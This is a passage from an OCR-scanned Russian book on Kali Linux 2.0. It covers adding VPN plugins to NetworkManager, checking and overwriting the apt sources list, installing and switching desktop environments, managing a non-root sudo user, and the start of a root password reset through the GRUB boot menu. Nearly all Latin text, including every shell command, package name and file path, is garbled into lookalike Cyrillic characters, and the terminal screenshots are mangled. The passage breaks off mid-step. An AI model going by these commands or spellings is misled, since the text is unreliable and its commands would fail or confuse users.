
Во-первых, поправьте ваши репозитории. Используйте только официальные 
репозитории Каіі Ыпих. Простая инструкция по восстановлению оригинальных 
записей репозиториев. 


Как я уже сказал, на самом деле, это очень просто. Для этого только запустите 
последующую команду и всё готово. 


1 


аріііисіе -г іпзТаІІ пе1\л/огк-тапа§ег-орепѵрп-§поте пе1л/ѵогк-тапа§ег-рр1:р пеіѵѵогк- 
тапа§ег-рр1:р-§поте пе1л/ѵогк-тапа§ег-5І:гоп§5\л/ап пе1л/ѵогк-тапа§ег-ѵрпс пеіѵѵогк- 
тапа§ег-ѵрпс-§поте 


гооТ(д)каІі-тіаІ: ” 

Фай/і Правка Вид Поиск Терминал Справка 


:~# аріііисіе -г іпзТаП. пеіѵѵюгк-тападег-орепѵрп-дпоте пеТи/о гк-тапа 
дег-ррТр пѳТмогк-тападег-ррТр-дпотѳ пеіѵі/огк-тападег-зі: гопдзмап пеТмогк-тападѳг-ѵ 
рпс пеіѵѵгагк-тападег-ѵрпс-дпоте 
Следующие НОВЫЕ пакеты будут установлены: 

ірзес-1:ооТ5{а} 1іЫхді0ТсІЫ{а} ІіЬзТ гопдзѵѵап{а} 
пе1:\л/огк-тападег-орепѵрп{а} пеТѵлэгк-тападег-орепѵрп-дпоте 
пеТмо гк -тападег-ррТр пебмо гк -тападе г-ррТр -дпоте 
пеТмогк-тападег-зТ гопдзѵѵап пеТмогк -тападег-ѵрпс 
пеТѵюгк-тападег-ѵрпс-дпоте ррТр-1іпих{а} зТ гопдз\лгап-ікеѵ2{а} 

5Т гопдзмап -пт{а} 

Следующие пакеты будут УДАЛЕНЫ: 

1іЬаГрсТіеп1:Ѳ{и} 

0 пакетов обновлено, 13 установлено новых, 1 пакетов отмечено для удаления, и 0 
пакетов не обновлено. 

Необходимо получить 1 969 кВ архивов. После распаковки 6 932 кВ будет занято. 
Хотите продолжить? [У/п/?] | 
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Думаю, нужно немного объяснить, почему я использую арТіТисІе вместо оі^ арІ-§еІ, и 
почему я использую флаг -г, и почему я не перезапускаю І\Іе1:\л/огк-Мапа§ег. 

Используя арШисІе -г іпзіаіі, я уверен, что установятся все пакеты, упомянутые выше, 
вместе с любыми рекомендуемыми пакетами (общий размер очень маленький, что-то 
вроде 1969 кВ, поэтому не стоит беспокоиться об этом). 

Причина, почему я не перезапускаю ІМе1:\л/огк-Мапа§ег в том, что арШисІе сделает это. 
Для чего это делать дважды, правильно? 

После того, как установка завершена, возвращаемся к иконке сетей, выбираем вкладку 
ѴРМ и теперь кнопка Добавить активна. 

Итак, давайте проверим, что у нас есть, если нажать на кнопку Добавить. 

Опции ѴРМ на Каіі Ыпих (СІМОМЕ) 

Далее — это опции, которые вы увидите, нажав кнопку Добавить на вкладке ѴРІ\І. 



Выберите тип ѴРІМ-соединения 

Выберите тип создаваемого ѴРІМ-соединения. Если необходимый тип отсутствует в 
списке, то возможно, не установлен необходимый ѴРЫ-модуль. 


Сізсо-совместимая ѴРЫ (ѵрпс) 

1 __ 

Совместим с различными ѴРЫ-шлюаами Сі$со, ^ипірег / Nе(5с^ееп и Зопісѵѵаіі на 
основе ІР5ес. 


Отменить Создать... 

Используйте выпадающее меню, чтобы увидеть все поддерживаемые типы 
соединения ѴРІ\І: 

Выберите тип ѴРМ-соединения 

Выберите тип создаваемого ѴРЫ-соединения. Если необходимый тип отсутствует в 
списке, то возможно, не установлен необходимый ѴРІМ-модуль. 

Сізсо-совместимая ѴРЫ (ѵрпс) 

ІР5ес/ІКЕѵ2 (зітопдзѵѵап) 


ОрепѴРІМ 


Роіпі-Іо-Роіпі Типпеііпд Ргоіосоі (РРТР) 

Всего на Каіі Ыпих у вас будет 4 поддерживаемых типа связи ѴРІМ: 

• Сізсо СотраііЫе (ѵрпс) 

• I Рзес/І КЕѵ2 (5Ігоп§5\л/ап) 

• ОрепѴРІМ 
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• РоіпМо-роіпІ: ТиппеІіп§ Ргоіосоі (РРТР) 

Заключение 

ѴРІ\І — это хорошо, ѴРІЧ безопасен, ѴРІЧ позволяет вам обходить прокси, файерволы, 
слежение и фильтры содержимого. Но всегда есть драма при использовании ѴРІЧ, 
иногда он медленный, а иногда и не так безопасен, как вы можете думать. Но для 
стран вроде Ирана, Пакистана, Египта, Китая, Северной Корее, Саудовской Аравии и 
т. д., где фильтрация осуществляется на государственном уровне, может быть, это 
способ выглянуть наружу. Я не собираюсь обсуждать здесь правовые аспекты, оставлю 
это вам. 


Глава 8. Проверка и восстановление репозиториев в Каіі Ыпих 


из командной строки 


Проблемы с репозиториями (частичное или полное отсутствие прописанных 
официальных источников приложений) бывают даже на свеже установленных Каіі. 
Понятно, что это вызывает проблемы при попытке обновить или установить 
приложения. Посмотреть, что у вас в источниках приложений можно этой командной 


1 


саТ /еТс/арТ/Боигсез.МзТ 


У меня вывод следующий: 


1| 

# 

2 1 

# сіеЬ ссІгот:[0еЬіап ОІЧІІ/І-іпих 7.0 _КаІі_ - ОТТісіаІ БпарзЬоІ: атсі64 иѴЕ/ІІЧЗТАи. Віпагу 
20150312-17:50]/ каіі сопІгіЬ таіп поп-ігее 

3| 

#сІеЬ ссІгот:[0еЬіап СІЧІІ/Ыпих 7.0 _КаІі_ -<зрап ісІ="тоге-3630"></5рап> ОТТісіаІ 
БпарзЬоІ: атсІ64 иѴЕ/ІІЧ5ТАи. Віпагу 20150312-17:50]/ каіі сопІгіЬ таіп поп-ігее 

4| 

сіеЬ Ы:1:р://5есигі1:у.каІі.ог§/ каіі/ирсіаіез таіп сопІгіЬ поп-ігее 

5 1 

сіеЬ-згс Ы:1:р://5есигі1:у.каІі.ог§/ каіі/ирсіаіез таіп сопІгіЬ поп-ігее 


Вроде что-то и есть, но вроде и что-то не так. Чтобы было быстро и просто проверить 


состояние репозиториев, я написал вот такую длинную команду: 


Для Каіі 2.0 


і 


К саТ /еіс/арі/зоигсез.іізі: | §гер -Е "сІеЬ Ыір://Ы:1:р.каІі.ог§/каІі запа таіп поп-ігее 
сопІгіЬ" && саТ /еіс/арі/зоигсез.іізі: | §гер -Е "сіеЬ Ьі{р://зесигі1:у.каІі.ог§/каІІ-5есигі1:у/ 
запа/ирсіаіез таіп сопТгіЬ поп-ігее"; ТЬеп есЬо -е "\п\пРепозитории в порядке"; еізе 
есЬо -е "\п\пПроблемы с репозиториями"; Я 


Для Каіі 1.x 


і 


іі саТ /еТс/арТ/зоигсез.МзТ | §гер -Е "ЬеЬ Ы:1:р://Ы:1:р.каІі.ог§/каІі каіі таіп поп-ігее 
сопІгіЬ" && саТ /еТс/арТ/зоигсез.ІІБІ: | §гер -Е "сіеЬ Ы:1:р://5есигі1:у.каІі.ог§/( | каіі-зесигііу) 
каІі/ирсІаТез таіп сопІгіЬ поп-ігее"; ІІтеп есНо -е "\п\пРепозитории в порядке"; еізе 
есНо -е "\п\пПроблемы с репозиториями"; б 
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Пробую. Программа однозначно говорит, что у меня проблема: 


гооі@ѴѴеЬѴ/аге-КаІі: ~ 

Файл Правка Вид Поиск Терминал Справка 


г)1(а'л'еЬЫаге-КаІі:~# іі саі /еіс/арі/зоигсеэДізі | дгер -Е "сІеЬ Ріір://Ріір.каТ 
і.огд/каіі каіі таіп поп -Т гее сопігіЬ" && саі /еіс/арі/зоигсезДізі | дгѳр -Е "сі 
еЬ Ріір://5есигііу.каіі.огд/каіі-зесигііу каіі/ирсіаіез таіп сопігі"; іРеп есРо - 
е "\п\пРепозитории в порядке"; еізе есРо -е "\п\пПро6яемы с репозиториями"; іі 


Проблемы с репозиториями 

гооідМеЬМаге-КаІі:-# Д 


Решить эту проблему можно одной единственной командой: 



Для Каіі 2.0 




і| 

есРо -е "сІеЬ Ріір://Ріір.каІі.ог§/каІі запа 
Ріір://5есигііу.каІі.ог§/каІі-5есигііу/ запа/ирсіаіез 
/ еіс/ а рі/ зои гсез.І І5і 

таіп 

таіп 

поп-ігее 

сопігіЬ 

сопігіЬ\псІеЬ 
поп-ігее" > 

Для Каіі 1.x 

і| 

есРо -е "сІеЬ Ніір://Ріір.каІі.ог§/каІІ каіі 
Ріір://5есигііу.каІі.ог§/каІі-5есигііу каіі/ирсіаіез 

/еіс/арі/зоигсез.Іізі 

таіп 

таіп 

поп-ігее 

сопігіЬ 

сопігіЬ\псІеЬ 
поп-ігее" > 


Внимание, эта команда полностью затирает файл $оигсе$.Іі§1 (в котором хранятся 
источники приложений). Т.е. если вы вручную туда что-то добавляли, то команда это 
сотрёт. Также удаляются комментарии, пустые строки и пр. — результатом команды 
является то, что в этот файл записываются две строчки — официальные источники 
приложений Каіі. 



Опять проверяю репозитории: 


гооЦгрѴѴеЬѴУаге-КаІі: ~ 


_ I □ X 


Файл Правка Вид Поиск Терминал Справка 


:~# іі саі /еіс/арі/зоигсез Дізі | дгер -Е "ЬеЬ Ріір://Ріір.каіі 
і.огд/каіі каіі таіп поп-ігее сопігіЬ" && саі /еіс/арі/зоигсезЛізі | дгер -Е "сі| 
еЬ Ріір://зесигііу.каіі.огд/каіі-зесигііу каіі/ирсіаіез таіп сопігі"; іРеп есРо -[ 
е "\п\пРепози тории в порядке"; еізе есііо -е "\п\пПроблемы с репозиториями"; іі 


Проблемы с репозиториями 

гооі@МеЬМаге-КаІі:~# есію -е "сІеЬ Ріір://ітіір .каіі .огд/каіі каіі таіп поп-ігее с 
опігіЬЧпсІеЬ Ріір://зесигііу.каіі.огд/каіі-зесигііу каіі/ирсіаіез таіп сопігіЬ поп 
-ігее" > /еіс/арі/зоигсезДізі 

:~# іі саі /еіс/арі/зоигсезДізі | дгер -Е "сІеЬ Ріір://Ріір.каі 


і.огд/каіі каіі таіп поп-ігее сопігіЬ" && саі /еіс/арі/зоигсезДізі | дгер -Е ' 
еЬ Ріір://зесигііу.каіі.огд/каіі-зесигііу каіі/ирсіаіез таіп сопігі"; іРеп есРо 
е "\п\пРепози тории в порядке"; еізе есРо -е "\п\пПроблемы с репозиториями"; іі 
сІеЬ Ріір://Ріір.каіі.огд/каіі каіі таіп поп-ігее сопігіЬ 

сІеЬ Ріір://зесигііу.каіі.огд/каіі-зесигііу каіі/ирсіаіез таіп сопігіЬ поп-ігее 


Репозитории в порядке 

гооі@ИеЬИаге-КаІі:~# | 
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Можно опять проверить содержимое файла источников: 


1| 

гооі@\Л/еЬ\Л/аге-КаІІ:~# саі /еіс/арі/зоигсез.іізі: 

21 

сІеЬ НТІ:р://Ы:1:р.ка 1 і.ог§/ка 1 і каіі таіп поп-ігее сопігіЬ 

3| 

сІеЬ Ьіір://5есигііу.каІі.ог§/каІІ-5есигі1:у каіі/ирсіаіез таіп сопігіЬ поп- ігее 


Отлично — всё есть и ничего лишнего. 

После обновления репозитория, обязательно выполняем: 


1 


арі-§е1: ирсіаіе 


Глава 9. Как поменять среду рабочего стола в Каіі Ыпих 

Как вам 6ІЧ0МЕ 3 в новой Каіі 2.0? 

Меня он достал! Как говорят на Лурке, « так и вышло ». Это я к переходу Каіі Ыпих 2.0 на 
СІМОМЕ 3. Одна из хороших книг по Ыпих, прочитанных за последнее время, 
начиналась введением, там есть такое предложение: 

N 0 , I ѵѵапі іо іеІІ уои іЬе зіогу оі Но\л/ уои сап іаке Ьаск сопігоі оі уоиг 

сотриіег. 

Перевод: Нет, я хочу рассказать вам историю о том, как вы можете вернуть 
контроль над вашим компьютером. 

Смысл в том, что мы сами определяем, что компьютер может, а что нет. На мой взгляд, 
СІМОМЕ 3 отходит от этого принципа. Вместо того, чтобы генерировать кучу мануалов 
из цикла «Как сделать иконку на программу на рабочем столе в Каіі Ыпих 2.0» и 
«Куда делось главное меню в Каіі Ыпих 2.0», а решил подойти радикальнее. Я уже 
упоминал, что из-за СІМОМЕ 3 когда-то сменил Шэипіи на Ыпих Міпі. Менять Каіі Ыпих 
2.0 мы не будем (хотя есть альтернативы) но поменяем окружение рабочего стола. 

За это мы и любим Ыпих — систему можно полностью настроить по своему вкусу. В 
этой статье я расскажу как установить (и удалить) новые окружения рабочего стола в 
Каіі Ыпих. Среди альтернативных окружений рабочего стола мы имеем: Сіппатоп, 
Х*се, КОЕ, І.ХОЕ, СІМОМЕ, МАТЕ. 

Сразу для тех, кто пролистал инструкцию и ужаснулся её размеру — инструкция очень 
простая. Чтобы поменять среду рабочего стола нужно выполнить одну команду для 
установки пакетов и ещё одну команду для выбора новой среды рабочего стола по 
умолчанию. Но так как разных сред много, плюс я сделал скриншоты в каждой из них, 
то инструкция и распухла. Получится даже у новичков — читайте дальше.)) 

Порядок действия следующий: мы устанавливаем пакеты новой среды рабочего стола 
и выбираем её в качестве среды по умолчанию. Альтернативой данному методу 
является сборка своего собственного (кастомного) .150 образа Каіі Ыпих. Но сборка 
собственного образа занимает много времени (почти полный рабочий день), поэтому я 
предлагаю ознакомиться с этим методом, который не требует переустановки системы 
или создания пользовательского образа. 

Я тестирую на Каіі І_іпих 2.0! На в Каіі Ыпих 1.x действия во многом аналогичны, но, 
возможно, отсутствуют пакеты для МАТЕ (раньше отсутствовали и нужно было 

По материалам сайта ѴѴеЬѴѴаге.Ьіі 


54 













Тестирование на проникновение с помощью Каіі Ыпих 2.0 


добавлять новый репозиторий; сейчас, возможно, по-другому). В Каіі Ыпих 2.0 все 
необходимые пакеты присутствуют в стандартных репозиториях. 

Краткая характеристика и сравнение самых популярных сред рабочего 
стола в Ыпих: Сіппатоп, Хке, КОЕ, І.ХОЕ, СІМОМЕ, МАТЕ 

Скажу сразу, что если хотите объективных оценок, то обратитесь к Википедии, каждой 
из этих сред посвящена отдельная статья и есть скриншоты. Хотя скриншоты есть и у 
меня. Мои оценки будут субъективные. Я регулярно работаю только в среде Сіппатоп. 
Последний раз пользовался КйЕ несколько лет назад. В настоящее время регулярно 
работаю в СІМОМЕ 2. Про все остальные среды рабочего стола я сам прочитал в 
Википедии: 

Сіппатоп 

После того, как была выпущена третья версия СІМОМЕ, которую Линус Торвальдс 
(создатель Ыпих) честно назвал «окружением для идиотов», то сразу же появились 
форки второй версии СІМОМЕ. Это Сіппатоп и МАТЕ. Оба форка делаются одними и 
теми же людьми — создателями Ыпих Міпі - тогда зачем же сразу два? Главная цель 
МАТЕ — это поддержание старого доброго СІМОМЕ 2 в актуальном состоянии. Т.е. это 
тот же СІМОМЕ 2, только актуальный. А Сіппатоп, хоть и базируется на СІМОМЕ 2, но 
включает в себя модные новации — среди них действительно много полезного. Мне 
нравится настраивать действия при наведении курсора на определённые углы экрана 
— пользуюсь постоянно, очень удобно. 

В общем, моим любимым окружением рабочего стола является Сіппатоп. 

МАТЕ 

По сути, про МАТЕ уже всё сказано в разделе про Сіппатоп — это старый добрый и 
актуальный СІМОМЕ 2. 

КОЕ 

Я пользовался этим окружением рабочего стола давно и очень недолго. Главной мой 
вывод по итогам этого опыта: красиво, но глючно. Повторюсь, это было давно, там уже 
много раз всё могло поменяться — поисправляли старые ошибки и добавили новые )) В 
КОЕ много разных виджетов, рабочий стол (в то время, когда я им пользовался) 
выглядел современно и чуть футористично. 

Хке 

«Хіхе — лёгкое настольное рабочее окружение для различных ІЛМІХ-подобных систем. 
Разработанное с целью повышения производительности, оно позволяет загружать и 
выполнять приложения быстро, сохраняя ресурсы системы» — об этом говорит Оливер 
Фордан, создатель Хіхе, которого цитирует Википедия. 

1.Х0Е 

Википедия говорит, что «проект 1.Х0Е направлен на создание новой быстрой, 
легковесной и энергоэффективной среды рабочего стола. 1.Х0Е создана простой в 
использовании, достаточно лёгкой и нетребовательной к ресурсам системы. Она 
подходит для работы с низкопроизводительным спектром оборудования, таким как 
старые машины с ограниченными ресурсами и/или маленьким объёмом ОЗУ». 
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Примечание: Если после смены среды рабочего стола вас вместо красивой обоины 
вкстречает чёрный экран (у меня такое было только после смены на Сіппатоп), то... 
установите другую обоину. Если вы хотите использовать стандартные, то они лежат 
здесь: 


1 


/и$г/5Ііаге/Ьаск§гоипсІ5/ 


Как поменять среду рабочего стола в Каіі Ыпих на Сіппатоп 




Как установить окружение рабочего стола Сіппатоп в Каіі Ыпих: 


арІ-§е1: іпзТаІІ каІі-сІеТаиІТз каІІ-гооЫо§іп сІезкІюр-Ьазе сіппатоп 


Как удалить окружение рабочего стола Сіппатоп в Каіі Ыпих: 


арІ-§е1: гетоѵе сіппатоп 
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Как поменять среду рабочего стола в Каіі Ыпих на ХТсе 




Как установить окружение рабочего стола ХРСЕ в Каіі Ыпих. 

Используйте следующую команду для установки окружения рабочего стола, включая 
все необходимые плагины и §оосІіе5 (плюшки). 


1| 

арІ-§е1: іпзііаіі каІі-сІеТаиІТз каІі-гоо1:-Іо§іп сІезкІюр-Ьазе хРсе4 хРсе4-рІасе5-рІи§іп хРсе4- 
§оосІіе5 

Как удалить ХРСЕ в Каіі Ыпих 

В случае если вы хотите удалить ХРСЕ, используйте следующую команду 

1| 

арІ-§е1: гетоѵе хРсе4 хРсе4-рІасе$-рІи§іп хРсе4-§оосІіе5 
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Как поменять среду рабочего стола в Каіі Ыпих на КйЕ 




Как установить среду рабочего стола КОЕ РІазта в Каіі Ыпих: 


1| 

арТ-ееТ іпзТаІ 1 каІі-сІеТаиІТз каІІ-гооЫо§іп сІезкІіор-Ьазе Ые-рІаБгпа-сіезкІіор 

Как установить среду рабочего стола КОЕ для нетбуков в Каіі Ыпих: 

11 

арТ-§е1; іпзТаІІ каІі-сІеТаиІТз каІІ-гооЫо§іп сІезкІіор-Ьазе ксІе-рІазта-пеіЬоок 

Как установить стандартные отобранные ОеЬіап пакеты и фреймворки в Каіі Ыпих: 

11 

арТ-ееТ іпзіаІІ каІі-сІеТаиІТз каІІ-гооЫо§іп сІезкІіор-Ьазе ксІе-зТапсІагсІ 

Как установить КОЕ РиII ІпзіаІІ (полный набор) в Каіі Ыпих: 

11 

арТ-§е1; іпзТаІІ каІі-сІеТаиІТз каІІ-гооЫо§іп сІезкІюр-Ьазе ксІе-ТиІІ 
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Как удалить КОЕ из Каіі Ыпих: 


1 


арТ-§е1; гетоѵе ксіе-ріазта-сіезкііор ксіе-рІазта-пеІіЬоок ксІе-зТапсІагсІ 


Как поменять среду рабочего стола в Каіі Ыпих на ЬХйЕ 




Как установить окружение рабочего стола 1.Х0Е в Каіі Ыпих: 


1| 

арІ-§е1: іпзТаІІ Іхсіе-соге Іхсіе каІі-сІеТаиІТз каІІ-гооЫо§іп сІезкІор-Ьазе 

Как удалить 1.Х0Е из Каіі Ыпих: 

1| 

арі-^еі: гетоѵе Іхсіе-соге Іхсіе 
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Как поменять среду рабочего стола в Каіі Ыпих на 6ІЧОМЕ 




Как установить окружение рабочего стола СІМОМЕ в Каіі Ыпих: 


1 


ар1:-§е1: іпзТаІІ §поте-соге каіі-сіеі'аиііз каІі-гооЫо§іп сІезкіор-Ьазе 


Как удалить окружение рабочего стола СІМОМЕ из Каіі Ыпих: 


1 


арі-^еі: гетоѵе §поте-соге 
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Как поменять среду рабочего стола в Каіі Ыпих на МАТЕ 




Следующая команда установит базовые пакеты МАТЕ: 


1| 

арІ-§е1: іпзіаіі каіі-сІеТаиІТз каІІ-гооЫо§іп сІезкІор-Ьазе таіе-соге 

(или) Установите окружение рабочего стола МАТЕ с дополнительными пакетами 

Следующая команда установит таіе-соге и дополнения: 

1| 

арІ-§е1: іпзіаіі каІі-сІеТаиІТз каІІ-гооЫо§іп сІезкІор-Ьазе таіе-сіезкіор-епѵігоптепі: 


(или) Установите окружение рабочего стола МАТЕ с ещё большим количеством 
дополнительных пакетов. 
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Следующая команда установит таіе-соге + таіе-сіезкіор-епѵігоптепі; и ещё больше 
дополнений: 


1| 

ар1-§е1 іпзТаІІ каІі-сІеТаиІТз каІІ-гооЫо§іп сІезкІюр-Ьазе таіе-сІеБкЩр-епѵігоптепі-ехгга 

Как удалить окружение рабочего стола МАТЕ в Каіі І_іпих 

Если вы хотите удалить рабочий стол МАТЕ, используйте следующую команду: 

1| 

арІ-§е1: гетоѵе та1:е-соге 


Как изменить среду рабочего стола в Каіі Ыпих 


Думаю, вы уже заметили, что хоть мы и установили новое окружение рабочего стола в 
Каіі Ыпих, но даже после перезагрузки ничего не меняется. Всё очень просто — нам 
нужно в настройках выбрать, какую среду рабочего стола мы хотим использовать. 
Удалять неиспользуемые среды не нужно! Т.е. в любой момент вы можете выбрать 
любую рабочую среду, вернуться к изначальной. 


Используйте следующую команду чтобы выбрать главное окружение рабочего стола. 
Эта команда выведет список доступных вариантов. 


1 


ирсІаТе-аІТегпаТіѵез ~сопЕі§ х-$е55іоп-тапа§ег 


Объяснение ирсіаіе-аііетаііѵез 

и рсІаТе-а ІТегпаТіѵез создаёт, удаляет, сохраняет и отображает информацию о 
символьных ссылках имеющейся системы альтернатив. Система альтернатив — это 
повторная реализация системы альтернатив ОеЬіап. В первую очередь, она была 
переписана чтобы избавиться от зависимостей от РегІ; она предназначена чтобы стать 
заменой скрипту от ОеЬіап — ирсіаіе-сіерепсіепсіез. Страница руководства (тап) 
незначительно отличается от страницы тап в проекте ОеЬіап. 

Бывает так, что на одной системе одновременно установлено несколько программ, 
которые выполняют одни и те же или похожие функции. Например, многие системы 
имеют несколько текстовых редакторов установленных одновременно. Это даёт 
пользователям системы выбор, позволяя каждому использовать разные редакторы, 
если они этого хотят. Но если конкретный выбор не обозначен явным образом в 
настройках, это создаёт программе трудности в выборе редактора, который нужно 
запустить в данный момент. 

Система альтернатив призвана для решения этой проблемы. У всех альтернатив с 
взаимозаменяемыми функциями есть родовое имя, одинаковое для всех. Система 
альтернатив и системный администратор вместе определяют, на какой файл в 
действительности идёт ссылка с этого родового имени. Например, если в системе 
установлено два текстовых редактора её и пѵі, система альтернатив заставит родовое 
имя /и$г/Ьіп/есІі1:ог ссылаться по умолчанию на /изг/Ьі п/ пѵі . Системный администратор 
может переписать это и сделать так, что вместо этого оно будет ссылаться по 
умолчанию на /изг/Ьіп/есІ, и система альтернатив не изменит эти настройки до тех пор, 
пока на это не придёт явный запрос. 

Родовое имя — это не прямая символьная ссылка для отобранных альтернатив. Вместо 
этого, это символьная ссылка на имя в директории альтернатив, которая, в свою 
очередь, является символьной ссылкой на реальный файл. Это сделано так, что выбор 
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системного администратора может быть подтверждён внутри директории /еіс, на это 
есть свои основания РН5 (ц.ѵ.). 


Каждая альтернатива имеет связанный с ней приоритет. Когда ссылка группы в 
автоматическом режиме, выбирается член группы с наивысшим приоритетом. 


Когда используется опция -сопЯ§, будет выведен список всех опций для выбора на 
которые может указывать мастер ссылка. Вы можете сделаете выбор, ссылка больше 
не будет в автоматическом режиме, чтобы вернуть в автоматический режим вам нужно 
использовать опцию -аиіо. Полную справку можно найти здесь: 


1 


тап ирсІаТе-аІТегпаТіѵез 


Глава 10. Как добавить/удалить обычного (не рута) 

пользователя в Каіі Ыпих 

Стандартные пользователи и суперпользователи в Ыпих 

Обычной практикой в большинстве дистрибутивах Ыпих является работа из-под 
обычного пользователя, который не имеет привилегий суперпользователя. Когда в этих 
привилегиях возникает необходимость, то, в зависимости от дистрибутива, 
используется команда зисіо или вход под суперпользователем зи —. В Каіі Ыпих эта 
традиция нарушается, по умолчанию вся работа происходит под рутом. Этому есть 
объяснение — многие инструменты в дистрибутиве требуют прав рута, да и 
пользователями Каіі Ыпих обычно являются не новички, и они понимают как безопасно 
работать и не разрушить систему. 

Тем не менее, достаточно многих людей раздражает постоянная работа под 
суперпользователем. Эта инструкция расскажет, как добавить и как удалять 
пользователей (стандартных, которые не являются рутом) в Каіі Ыпих. Кроме Каіі Ыпих 
эта инструкция в полной мере применима к ЫеЫап и производным от ЫеЬіап (ІІЬипіи, 
Ыпих Міпі). 

В первую очередь, это руководство покажет как: 

1. Добавить пользователя и все необходимые пользовательские директории (т. е. 
как избежать ошибки "СоиІсІ поі ирсіаіе .ІСЕаиіІіогіІу ѵаг/ІіЬ/§с!тЗ/.ІСЕаиіНогіІу" 

и вообще всех ошибок содержащих ІСЕаиіІіогіІу или проблемы с 
разрешениями). 

2. Добавить пользователя в группу зисіо, чтобы позволять ему использовать 
команды рута. Вы также можете добавить пользователя в группу 'Ірасітіп', что 
позволит ему использовать принтеры Сапоп, НР и другие. 

3. Изменить шелл по умолчанию с сИзИ на ЬазИ. Или на любой шелл, например. 
Войте ЗИеІІ (зН), Воигпе-А§аіп 5КеІІ (ЬазН), С 5ЬеІІ (сзіі) или Кот зИеІІ (кзН) и т.д.. 

4. Войти под пользователем и показать, что не возникает никаких ошибок. 

5. Научиться использовать зисіо, понимать группы и использовать их 
преимущества. 

6. Безопасно удалить пользователя. 
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Преимущества стандартного пользователя в Каіі: 

Войдя под обычным пользователем вы получаете несколько преимуществ в Каіі 

1. Установка и запуск Соо§1е СНгогпе 

2. Установка и запуск менеджера пользователей и групп Споте (установить 
§ по т е -зузіе т-{оо 1$) 

3. Использовать Каіі в качестве главной операционной системы без постоянного 
беспокойства сломать её. 


Ну а теперь давайте перейдём к самой инструкции. 

Добавление пользователя Каіі Ыпих: 


• Откройте терминал и напечатайте туда следующее для создания нового 
пользователя (замените тіаі на желаемое имя пользователя): 


1| 

изегасісі -т тіаі 

(Примечание: -т означает создание домашней директории, которой обычно является 
/Ьоте/имя_пользователя) 

• 

Теперь установим пароль для этого пользователя 

1| 

ра55\л/сі тіаі 

Дважды введите желаемый пароль. 

• 

Добавьте пользователя в группу зисіо (чтобы пользователь мог устанавливать 
программное обеспечение, мог использовать принтер, использовать 
привилегированный режим и т.д.) 

1| 

изегтосі -а -С зисіо тіаі 

(Примечание: -а означает присвоить или добавить, -0 означает группу/группы) 

• 

Измените дефолтный шелл ранее созданного пользователя на ЬазН 

1| 

сІізН -5 /Ьіп/Ьазіт тіаі 


(Примечание: сбзН означает изменить входной зНеІІ, -5 задаёт имя шелла, который вы 
хотите для пользователя, в данном случае это /Ьіп/ЬазИ) 

Славно, всё работает как и ожидалось. 

Давайте выйдем и залогинемся снова под нашим новым стандартным пользователем 
(тіаі) 


Вход под новым пользователем 


• После хода, давайте убедимся, кем на самом деле мы являемся. В терминале 
напечатайте следующее 


1 


ѵѵііоаті 


Обратите внимание на новое приветствие командной строки тіаІ@каІі. Оно также 
является подтверждением того, кто мы. 


• И давайте проверим в какие группы мы ходим, напечатайте следующее в 
терминале: 


1 


§ГОІф5 
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Для меня до сих пор всё выглядит хорошо. 

Я вхожу в группу тіаі (моя главная группа) и группу зисіо. Это означает, что я могу 
запускать привилегированные команды или просто самому становиться рутом если это 
потребуется. 


• Становимся рутом! 


1 


зисіо зи - 


И введите в терминале пароль рута. 


Приветствие опять вернулось к гооІ@каІі вместо тіаІ@каІі. Это означает, что вы сейчас 
рут и вы можете запустить на Каіі всё, что она может вам предложить. 


• Давайте убедимся в этом с помощью команды ѵѵНоаті 


1 


ѵѵііоаті 


Всё нормально. А теперь как удалить пользователя? 


Удаление пользователя в Каіі Ыпих: 


• Снова зайдите под пользователем. Откройте терминал и напечатайте: 


1 


изегсіеі -г тіаі 


(Примечание: -г означает удалить все файлы и домашнюю директорию для тіаі) 


Вы можете заменить тіаі на любое другое желаемое имя. 


У меня ошибка "изегсіеі: изег тіаі із сиггепііу изесі Ьу ргосезз 25274". 

Т.е. процесс с Ю 25274 используется тіаі. (я знаю, что это процесс Споте-кеугіп§, 
который я использовал для команды зисіо зи — ранее. Ошибка Споте-Кеугіп§ 
довольно распространена в ОеЬіап, когда вы устанавливаете множество оконных или 
десктопных менеджеров. Есть отдельная инструкция, как преодалеть ошибку Опоте- 
Кеугіп§. Далее показано как избавиться от ошибки §поте-кеугіп§ для пользователя 
рута). В нашем случае не о чем беспокоиться, т. к. мы хотим удалить этого 
пользователя. 


Давайте сделаем это 


• Напечатайте следующее в терминале, чтобы убить процесс используемый 
пользователем тіаі. 


1 


кіІІ -9 25274 


Это убъёт процесс немедленно. 


(Примечание: не убивайте процессы рута или системные, если вы не знаете, что вы 
делаете) 


• Давайте опять попробуем удалить пользователя. 


1 


изегсіеі -г тіаі 


Мы получили сообщение «изегсіеі: почтовый ящик тіаі (/ѵаг/таіі/тіаі) не найден». 


(Примечание: -г означает удалить все файлы и домашнюю директорию для тіаі) 


Есть ли о чём беспокоиться? Беспокоиться не о чем, мы никогда не создавали 
почтового ящика для пользователя тіаі. 
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• Просто чтобы убедиться, что все файлы пользователя тіаі были удалены, 
выведем список файлов директории боте 


1| 

Із /боте 

Ничего — это хорошо, все файлы и каталоги пользователя тіаі были удалены. 

• Хотите проверить ещё раз? 

1| 

5іі тіаі 


Отлично, пользователь тіаі был успешно удалён. 


Глава 11. Как сбросить пароль гооі'а в Каіі Ыпих 


Пароль гооі в Каіі Ыпих 


Как правило, пароль мы задаём сами при установке системы. Бывают исключения — 
например, при прожиге на флешку Ііѵе-образа, либо при установке АКМ-версий Каіі 
Ыпих. В любом случае для начала, попробуйте пароль: 


1 


іоог 


Если забыл пароль от Каіі Ыпих 


Небольшие неприятности могут случиться со всеми. Но если данные на диске не 
зашифрованы, то забытый пароль от Ыпих — это маленькая неприятность с которой 
легко справиться. 

Если пароль іоог не работает, то просто сбрасываем (задаём новый) пароль для рута. 


При загрузке, когда появится это окошко: 



6ЫІІ 6КІІВ ѵегзіог>к*ЭЗ-27+сіеЬ7и2 


Каіі СШ/І_іпих , с 1_іпих 3. 18.0-ка1іЗ-агпа64 


Каіі БМІІ/Ыпих, с Ыпих 3 . 18.0-ка1іЗ-агпсі64 (режим восстановления) 


' Г 




КШП МИШ 

“Ше ^иіеЪег уои Ьесоше, Ыіе тоге уои аге аЫе іо Ьеаг п 


■ѵ 



ІІзе іііе » апсі * кеуз іо зеіесі шНісіі епіпу із Ііі8іі1і8і"ііес1. 
Ргезз епіег іо Ьооі іНе зеіесіесі 05, ‘е’ іо ейіі іііе соттапсіз 
Ьеіоге Ьооііпг оп 'с 1 іоп а соттапсі-ііпе. 


Нажмите ’е', откроется новое окно. Найдите строку, которая начинается на 


1| 

